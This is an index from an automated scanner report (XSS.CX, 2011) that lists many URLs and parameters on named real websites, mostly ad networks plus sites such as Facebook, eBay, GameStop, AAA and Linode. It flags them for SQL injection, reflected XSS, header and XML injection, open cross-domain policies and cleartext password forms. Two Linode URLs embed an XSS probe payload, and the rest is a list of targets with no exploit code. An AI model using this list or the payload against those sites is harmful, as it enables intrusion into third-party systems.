XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 07202011-03

Report generated by XSS.CX at Wed Jul 20 07:45:44 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. SQL injection

1.1. http://cm.g.doubleclick.net/pixel [id cookie]

1.2. http://umfcluj.ro/Detaliu.aspx [t parameter]

1.3. http://umfcluj.ro/lista.aspx [t parameter]

1.4. http://www.facebook.com/plugins/like.php [datr cookie]

2. LDAP injection

3. HTTP header injection

3.1. http://ad.doubleclick.net/adi/N1558.NetMining/B5146585.127 [REST URL parameter 1]

3.2. http://ad.doubleclick.net/adj/cm.quadbostonglobe/ [REST URL parameter 1]

3.3. http://matcher.bidder7.mookie1.com/google [cver parameter]

4. Cross-site scripting (reflected)

4.1. http://a.collective-media.net/adj/cm.quadbostonglobe/ [REST URL parameter 2]

4.2. http://a.collective-media.net/adj/cm.quadbostonglobe/ [name of an arbitrarily supplied request parameter]

4.3. http://a.collective-media.net/adj/cm.quadbostonglobe/ [sz parameter]

4.4. http://a.collective-media.net/adj/q1.q.boston/be_bus [REST URL parameter 2]

4.5. http://a.collective-media.net/adj/q1.q.boston/be_bus [REST URL parameter 3]

4.6. http://a.collective-media.net/adj/q1.q.boston/be_bus [sz parameter]

4.7. http://a.collective-media.net/adj/q1.q.boston/be_home [REST URL parameter 2]

4.8. http://a.collective-media.net/adj/q1.q.boston/be_home [REST URL parameter 3]

4.9. http://a.collective-media.net/adj/q1.q.boston/be_home [name of an arbitrarily supplied request parameter]

4.10. http://a.collective-media.net/adj/q1.q.boston/be_home [sz parameter]

4.11. http://a.collective-media.net/adj/q1.q.boston/bus [REST URL parameter 2]

4.12. http://a.collective-media.net/adj/q1.q.boston/bus [REST URL parameter 3]

4.13. http://a.collective-media.net/adj/q1.q.boston/bus [name of an arbitrarily supplied request parameter]

4.14. http://a.collective-media.net/adj/q1.q.boston/bus [sz parameter]

4.15. http://a.collective-media.net/cmadj/q1.q.boston/be_bus [REST URL parameter 1]

4.16. http://a.collective-media.net/cmadj/q1.q.boston/be_bus [REST URL parameter 2]

4.17. http://a.collective-media.net/cmadj/q1.q.boston/be_bus [REST URL parameter 3]

4.18. http://a.collective-media.net/cmadj/q1.q.boston/be_bus [sz parameter]

4.19. http://a.collective-media.net/cmadj/q1.q.boston/be_home [REST URL parameter 1]

4.20. http://a.collective-media.net/cmadj/q1.q.boston/be_home [REST URL parameter 2]

4.21. http://a.collective-media.net/cmadj/q1.q.boston/be_home [REST URL parameter 3]

4.22. http://a.collective-media.net/cmadj/q1.q.boston/be_home [sz parameter]

4.23. http://a.collective-media.net/cmadj/q1.q.boston/bus [REST URL parameter 1]

4.24. http://a.collective-media.net/cmadj/q1.q.boston/bus [REST URL parameter 2]

4.25. http://a.collective-media.net/cmadj/q1.q.boston/bus [REST URL parameter 3]

4.26. http://a.collective-media.net/cmadj/q1.q.boston/bus [sz parameter]

4.27. http://a.netmng.com/hic/ [passback&click parameter]

4.28. http://a.netmng.com/hic/ [passback&click parameter]

4.29. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

4.30. http://admeld.adnxs.com/usersync [admeld_callback parameter]

4.31. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]

4.32. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]

4.33. http://api.bing.com/qsonhs.aspx [q parameter]

4.34. http://api.choicestream.com/instr/api/8e360375d27a5381/a1 [callback parameter]

4.35. http://b.scorecardresearch.com/beacon.js [c1 parameter]

4.36. http://b.scorecardresearch.com/beacon.js [c10 parameter]

4.37. http://b.scorecardresearch.com/beacon.js [c15 parameter]

4.38. http://b.scorecardresearch.com/beacon.js [c2 parameter]

4.39. http://b.scorecardresearch.com/beacon.js [c3 parameter]

4.40. http://b.scorecardresearch.com/beacon.js [c4 parameter]

4.41. http://b.scorecardresearch.com/beacon.js [c5 parameter]

4.42. http://b.scorecardresearch.com/beacon.js [c6 parameter]

4.43. http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3 [REST URL parameter 2]

4.44. http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3 [REST URL parameter 3]

4.45. http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3 [REST URL parameter 4]

4.46. http://b3.mookie1.com/2/ticketmaster/172548/11408426983@x01 [REST URL parameter 2]

4.47. http://b3.mookie1.com/2/ticketmaster/172548/11408426983@x01 [REST URL parameter 3]

4.48. http://b3.mookie1.com/2/ticketmaster/172548/11408426983@x01 [REST URL parameter 4]

4.49. http://b3.mookie1.com/2/ticketmaster/AirCanadaCentre/11408426983@x01 [REST URL parameter 2]

4.50. http://b3.mookie1.com/2/ticketmaster/AirCanadaCentre/11408426983@x01 [REST URL parameter 3]

4.51. http://b3.mookie1.com/2/ticketmaster/AirCanadaCentre/11408426983@x01 [REST URL parameter 4]

4.52. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [&_RM_HTML_artist1_name_ parameter]

4.53. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [REST URL parameter 2]

4.54. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [REST URL parameter 3]

4.55. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [REST URL parameter 4]

4.56. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_artistid_ parameter]

4.57. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_bstate_ parameter]

4.58. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_bzip_ parameter]

4.59. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_confcode_ parameter]

4.60. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_country_ parameter]

4.61. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_event_date_ parameter]

4.62. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_event_day_ parameter]

4.63. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_event_name_ parameter]

4.64. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_event_time_ parameter]

4.65. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_event_time_zone_ parameter]

4.66. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_eventid_ parameter]

4.67. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_fvalue_ parameter]

4.68. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_majorcatid_ parameter]

4.69. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_minorcatid_ parameter]

4.70. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_pdate_ parameter]

4.71. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_pday_ parameter]

4.72. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_ptime_ parameter]

4.73. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_tixp_ parameter]

4.74. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_venue_name_ parameter]

4.75. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_venueid_ parameter]

4.76. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_venuezip_ parameter]

4.77. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1627503762@x96 [REST URL parameter 2]

4.78. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1627503762@x96 [REST URL parameter 3]

4.79. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1627503762@x96 [REST URL parameter 4]

4.80. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1936689153@x96 [REST URL parameter 2]

4.81. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1936689153@x96 [REST URL parameter 3]

4.82. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1936689153@x96 [REST URL parameter 4]

4.83. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1@x96 [REST URL parameter 2]

4.84. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1@x96 [REST URL parameter 3]

4.85. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1@x96 [REST URL parameter 4]

4.86. http://bing.fansnap.com/checkout/index/415814268 [REST URL parameter 3]

4.87. http://bing.fansnap.com/checkout/index/415814268 [afm parameter]

4.88. http://bing.fansnap.com/checkout/index/415814268 [ch parameter]

4.89. http://bing.fansnap.com/checkout/index/415814268 [ctx parameter]

4.90. http://bing.fansnap.com/checkout/index/415814268 [poctx parameter]

4.91. http://bing.fansnap.com/checkout/index/415814268 [quantity parameter]

4.92. http://bing.fansnap.com/checkout/index/415814268 [uet parameter]

4.93. http://bing.fansnap.com/checkout/index/418563179 [REST URL parameter 3]

4.94. http://bing.fansnap.com/checkout/index/418563179 [afm parameter]

4.95. http://bing.fansnap.com/checkout/index/418563179 [ch parameter]

4.96. http://bing.fansnap.com/checkout/index/418563179 [ctx parameter]

4.97. http://bing.fansnap.com/checkout/index/418563179 [poctx parameter]

4.98. http://bing.fansnap.com/checkout/index/418563179 [quantity parameter]

4.99. http://bing.fansnap.com/checkout/index/418563179 [uet parameter]

4.100. http://cdnt.meteorsolutions.com/api/track [jsonp parameter]

4.101. http://corporate.everydayhealth.com/ [name of an arbitrarily supplied request parameter]

4.102. http://corporate.everydayhealth.com/about-eh-sites.aspx [name of an arbitrarily supplied request parameter]

4.103. http://digg.com/ajax/tooltip/submit [REST URL parameter 1]

4.104. http://digg.com/ajax/tooltip/submit [REST URL parameter 2]

4.105. http://digg.com/submit [REST URL parameter 1]

4.106. http://ib.adnxs.com/ptj [redir parameter]

4.107. http://image.providesupport.com/cmd/versionone [REST URL parameter 1]

4.108. http://js.revsci.net/gateway/gw.js [csid parameter]

4.109. https://manager.linode.com/session/forgot_save/%22%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E [REST URL parameter 3]

4.110. https://manager.linode.com/session/forgot_save/%22%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E [REST URL parameter 3]

4.111. https://manager.linode.com/session/forgot_save/N [REST URL parameter 3]

4.112. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

4.113. http://r.turn.com/server/pixel.htm [fpid parameter]

4.114. http://r.turn.com/server/pixel.htm [sp parameter]

4.115. http://rd.rlcdn.com/rd [var parameter]

4.116. http://realnetworks.com/workarea/csslib/ektronCss.ashx [id parameter]

4.117. http://realnetworks.com/workarea/java/ektronJs.ashx [id parameter]

4.118. http://realnetworks.com/workarea/java/ektronJs.ashx [id parameter]

4.119. http://realnetworksrealarca.tt.omtrdc.net/m2/realnetworksrealarca/mbox/standard [mbox parameter]

4.120. http://rover.ebay.com/idmap/0 [footer&cb parameter]

4.121. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]

4.122. http://sitelife.boston.com/ver1.0/Direct/Jsonp [cb parameter]

4.123. http://stubhub.tt.omtrdc.net/m2/stubhub/mbox/standard [mbox parameter]

4.124. http://support.fastteks.com/contact-us.php [name of an arbitrarily supplied request parameter]

4.125. http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/page_parser.js [d parameter]

4.126. http://umfcluj.ro/contact.aspx [name of an arbitrarily supplied request parameter]

4.127. http://waypointlivingspaces.com/locate-dealer [zip parameter]

4.128. http://waypointlivingspaces.com/locate-dealer [zip parameter]

4.129. http://www.aaa.com/ [rurl parameter]

4.130. http://www.aaa.com/ [rurl parameter]

4.131. http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route [rurl parameter]

4.132. http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route [rurl parameter]

4.133. http://www.gamestop.com/ [name of an arbitrarily supplied request parameter]

4.134. http://www.gamestop.com/JavaScript/CertonaTable.htm [REST URL parameter 1]

4.135. http://www.gamestop.com/JavaScript/CertonaTable.htm [REST URL parameter 2]

4.136. http://www.gamestop.com/Recommendations.axd [REST URL parameter 1]

4.137. http://www.gamestop.com/ScriptResource.axd [REST URL parameter 1]

4.138. http://www.gamestop.com/WebResource.axd [REST URL parameter 1]

4.139. http://www.gamestop.com/common/gui/favicon.ico [REST URL parameter 1]

4.140. http://www.gamestop.com/common/gui/favicon.ico [REST URL parameter 2]

4.141. http://www.gamestop.com/common/gui/favicon.ico [REST URL parameter 3]

4.142. http://www.netlogiq.ro/Portofoliu-Web-Design.html [name of an arbitrarily supplied request parameter]

4.143. http://www.stumbleupon.com/submit [url parameter]

4.144. http://a.collective-media.net/cmadj/q1.q.boston/be_bus [cli cookie]

4.145. http://a.collective-media.net/cmadj/q1.q.boston/be_home [cli cookie]

4.146. http://a.collective-media.net/cmadj/q1.q.boston/bus [cli cookie]

4.147. http://seg.sharethis.com/getSegment.php [__stid cookie]

4.148. http://tag.admeld.com/ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216 [meld_sess cookie]

4.149. http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228 [meld_sess cookie]

4.150. http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606228 [meld_sess cookie]

4.151. http://www.clickmanage.com/events/clickevent.aspx [u parameter]

5. Flash cross-domain policy

5.1. http://0.gravatar.com/crossdomain.xml

5.2. http://1.gravatar.com/crossdomain.xml

5.3. http://a.collective-media.net/crossdomain.xml

5.4. http://a.netmng.com/crossdomain.xml

5.5. http://a.ok.facebook.com/crossdomain.xml

5.6. http://a.tribalfusion.com/crossdomain.xml

5.7. http://ad.doubleclick.net/crossdomain.xml

5.8. http://admeld.adnxs.com/crossdomain.xml

5.9. http://ads.as4x.tmcs.ticketmaster.com/crossdomain.xml

5.10. http://ads.undertone.com/crossdomain.xml

5.11. http://adx.adnxs.com/crossdomain.xml

5.12. http://api.brightcove.com/crossdomain.xml

5.13. http://b.scorecardresearch.com/crossdomain.xml

5.14. http://b3.mookie1.com/crossdomain.xml

5.15. http://bh.contextweb.com/crossdomain.xml

5.16. http://bs.serving-sys.com/crossdomain.xml

5.17. http://c.atdmt.com/crossdomain.xml

5.18. http://cache.specificmedia.com/crossdomain.xml

5.19. http://cdn.turn.com/crossdomain.xml

5.20. http://creatives.as4x.tmcs.net/crossdomain.xml

5.21. http://d.agkn.com/crossdomain.xml

5.22. http://dev.virtualearth.net/crossdomain.xml

5.23. http://ecn.api.tiles.virtualearth.net/crossdomain.xml

5.24. http://ecn.dev.virtualearth.net/crossdomain.xml

5.25. http://ecn.t0.tiles.virtualearth.net/crossdomain.xml

5.26. http://ecn.t1.tiles.virtualearth.net/crossdomain.xml

5.27. http://ecn.t2.tiles.virtualearth.net/crossdomain.xml

5.28. http://ecn.t3.tiles.virtualearth.net/crossdomain.xml

5.29. http://external.ak.fbcdn.net/crossdomain.xml

5.30. http://farecastcom.122.2o7.net/crossdomain.xml

5.31. http://files.livedrive.com/crossdomain.xml

5.32. http://g-pixel.invitemedia.com/crossdomain.xml

5.33. http://img1.catalog.video.msn.com/crossdomain.xml

5.34. http://img2.catalog.video.msn.com/crossdomain.xml

5.35. http://img3.catalog.video.msn.com/crossdomain.xml

5.36. http://img4.catalog.video.msn.com/crossdomain.xml

5.37. http://in.getclicky.com/crossdomain.xml

5.38. http://log50.doubleverify.com/crossdomain.xml

5.39. http://media.fastclick.net/crossdomain.xml

5.40. http://metrics.boston.com/crossdomain.xml

5.41. http://metrics.ticketmaster.com/crossdomain.xml

5.42. http://metrics.versionone.com/crossdomain.xml

5.43. http://now.eloqua.com/crossdomain.xml

5.44. http://pixel.invitemedia.com/crossdomain.xml

5.45. http://pixel.quantserve.com/crossdomain.xml

5.46. http://puma.vizu.com/crossdomain.xml

5.47. http://r.turn.com/crossdomain.xml

5.48. http://s3.amazonaws.com/crossdomain.xml

5.49. http://secure.adnxs.com/crossdomain.xml

5.50. http://segment-pixel.invitemedia.com/crossdomain.xml

5.51. http://statse.webtrendslive.com/crossdomain.xml

5.52. http://stubhub.tt.omtrdc.net/crossdomain.xml

5.53. http://t.mookie1.com/crossdomain.xml

5.54. http://wa.stubhub.com/crossdomain.xml

5.55. http://www.clickmanage.com/crossdomain.xml

5.56. http://add.my.yahoo.com/crossdomain.xml

5.57. http://api.bing.com/crossdomain.xml

5.58. http://api.choicestream.com/crossdomain.xml

5.59. http://b.myspace.com/crossdomain.xml

5.60. http://cdn.stumble-upon.com/crossdomain.xml

5.61. http://cgi.ebay.com/crossdomain.xml

5.62. http://developers.facebook.com/crossdomain.xml

5.63. http://edge.sharethis.com/crossdomain.xml

5.64. http://feeds.bbci.co.uk/crossdomain.xml

5.65. http://googleads.g.doubleclick.net/crossdomain.xml

5.66. http://newsrss.bbc.co.uk/crossdomain.xml

5.67. http://rover.ebay.com/crossdomain.xml

5.68. http://srx.main.ebayrtm.com/crossdomain.xml

5.69. http://static.ak.fbcdn.net/crossdomain.xml

5.70. http://wd.sharethis.com/crossdomain.xml

5.71. http://www.facebook.com/crossdomain.xml

5.72. http://www.myspace.com/crossdomain.xml

5.73. http://www.res-x.com/crossdomain.xml

5.74. http://www.stumbleupon.com/crossdomain.xml

5.75. http://www.ticketmaster.com/crossdomain.xml

5.76. http://boston.com/crossdomain.xml

5.77. http://cache.boston.com/crossdomain.xml

5.78. http://rmedia.boston.com/crossdomain.xml

5.79. http://www.boston.com/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://ad.doubleclick.net/clientaccesspolicy.xml

6.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

6.3. http://c.atdmt.com/clientaccesspolicy.xml

6.4. http://dev.virtualearth.net/clientaccesspolicy.xml

6.5. http://ecn.api.tiles.virtualearth.net/clientaccesspolicy.xml

6.6. http://ecn.dev.virtualearth.net/clientaccesspolicy.xml

6.7. http://ecn.t0.tiles.virtualearth.net/clientaccesspolicy.xml

6.8. http://ecn.t1.tiles.virtualearth.net/clientaccesspolicy.xml

6.9. http://ecn.t2.tiles.virtualearth.net/clientaccesspolicy.xml

6.10. http://ecn.t3.tiles.virtualearth.net/clientaccesspolicy.xml

6.11. http://farecastcom.122.2o7.net/clientaccesspolicy.xml

6.12. http://img1.catalog.video.msn.com/clientaccesspolicy.xml

6.13. http://img2.catalog.video.msn.com/clientaccesspolicy.xml

6.14. http://img3.catalog.video.msn.com/clientaccesspolicy.xml

6.15. http://img4.catalog.video.msn.com/clientaccesspolicy.xml

6.16. http://metrics.boston.com/clientaccesspolicy.xml

6.17. http://metrics.ticketmaster.com/clientaccesspolicy.xml

6.18. http://metrics.versionone.com/clientaccesspolicy.xml

6.19. http://wa.stubhub.com/clientaccesspolicy.xml

6.20. http://a1.bing4.com/clientaccesspolicy.xml

6.21. http://a2.bing4.com/clientaccesspolicy.xml

6.22. http://a3.bing4.com/clientaccesspolicy.xml

6.23. http://a4.bing4.com/clientaccesspolicy.xml

6.24. http://api.bing.com/clientaccesspolicy.xml

6.25. http://ts1.mm.bing.net/clientaccesspolicy.xml

6.26. http://ts2.mm.bing.net/clientaccesspolicy.xml

6.27. http://ts3.mm.bing.net/clientaccesspolicy.xml

6.28. http://ts4.mm.bing.net/clientaccesspolicy.xml

6.29. http://profile.live.com/clientaccesspolicy.xml

7. Cleartext submission of password

7.1. http://digg.com/submit

7.2. http://forum.redbyte.ro/

7.3. http://waypointlivingspaces.com/function.mysql-connect

7.4. http://waypointlivingspaces.com/locate-dealer

7.5. http://waypointlivingspaces.com/user

7.6. http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html

7.7. http://www.facebook.com/r.php

7.8. http://www.nne.aaa.com/en-nne/Pages/Home.aspx

8. XML injection

8.1. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/1px.png [REST URL parameter 1]

8.2. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/1px.png [REST URL parameter 2]

8.3. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/1px.png [REST URL parameter 3]

8.4. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-15.gif [REST URL parameter 1]

8.5. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-15.gif [REST URL parameter 2]

8.6. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-15.gif [REST URL parameter 3]

8.7. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-15.gif [REST URL parameter 4]

8.8. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-15.gif [REST URL parameter 1]

8.9. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-15.gif [REST URL parameter 2]

8.10. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-15.gif [REST URL parameter 3]

8.11. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-15.gif [REST URL parameter 4]

8.12. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/best-valuepoint-17px.png [REST URL parameter 1]

8.13. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/best-valuepoint-17px.png [REST URL parameter 2]

8.14. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/best-valuepoint-17px.png [REST URL parameter 3]

8.15. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/best-valuepoint-17px.png [REST URL parameter 4]

8.16. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js [REST URL parameter 1]

8.17. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js [REST URL parameter 2]

8.18. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js [REST URL parameter 3]

8.19. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js [REST URL parameter 1]

8.20. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js [REST URL parameter 2]

8.21. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js [REST URL parameter 3]

8.22. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png [REST URL parameter 1]

8.23. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png [REST URL parameter 2]

8.24. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png [REST URL parameter 3]

8.25. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-549.gif [REST URL parameter 1]

8.26. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-549.gif [REST URL parameter 2]

8.27. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-549.gif [REST URL parameter 3]

8.28. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-549.gif [REST URL parameter 4]

8.29. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-135.gif [REST URL parameter 1]

8.30. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-135.gif [REST URL parameter 2]

8.31. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-135.gif [REST URL parameter 3]

8.32. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-135.gif [REST URL parameter 4]

8.33. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-143.gif [REST URL parameter 1]

8.34. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-143.gif [REST URL parameter 2]

8.35. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-143.gif [REST URL parameter 3]

8.36. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-143.gif [REST URL parameter 4]

8.37. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-511.gif [REST URL parameter 1]

8.38. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-511.gif [REST URL parameter 2]

8.39. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-511.gif [REST URL parameter 3]

8.40. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-511.gif [REST URL parameter 4]

8.41. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-522.gif [REST URL parameter 1]

8.42. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-522.gif [REST URL parameter 2]

8.43. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-522.gif [REST URL parameter 3]

8.44. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-522.gif [REST URL parameter 4]

8.45. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-529.gif [REST URL parameter 1]

8.46. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-529.gif [REST URL parameter 2]

8.47. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-529.gif [REST URL parameter 3]

8.48. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-529.gif [REST URL parameter 4]

8.49. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-549.gif [REST URL parameter 1]

8.50. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-549.gif [REST URL parameter 2]

8.51. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-549.gif [REST URL parameter 3]

8.52. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-549.gif [REST URL parameter 4]

8.53. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-664.gif [REST URL parameter 1]

8.54. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-664.gif [REST URL parameter 2]

8.55. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-664.gif [REST URL parameter 3]

8.56. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-664.gif [REST URL parameter 4]

8.57. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-135.gif [REST URL parameter 1]

8.58. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-135.gif [REST URL parameter 2]

8.59. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-135.gif [REST URL parameter 3]

8.60. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-135.gif [REST URL parameter 4]

8.61. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-511.gif [REST URL parameter 1]

8.62. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-511.gif [REST URL parameter 2]

8.63. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-511.gif [REST URL parameter 3]

8.64. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-511.gif [REST URL parameter 4]

8.65. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-522.gif [REST URL parameter 1]

8.66. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-522.gif [REST URL parameter 2]

8.67. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-522.gif [REST URL parameter 3]

8.68. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-522.gif [REST URL parameter 4]

8.69. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-529.gif [REST URL parameter 1]

8.70. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-529.gif [REST URL parameter 2]

8.71. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-529.gif [REST URL parameter 3]

8.72. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-529.gif [REST URL parameter 4]

8.73. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-549.gif [REST URL parameter 1]

8.74. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-549.gif [REST URL parameter 2]

8.75. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-549.gif [REST URL parameter 3]

8.76. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-549.gif [REST URL parameter 4]

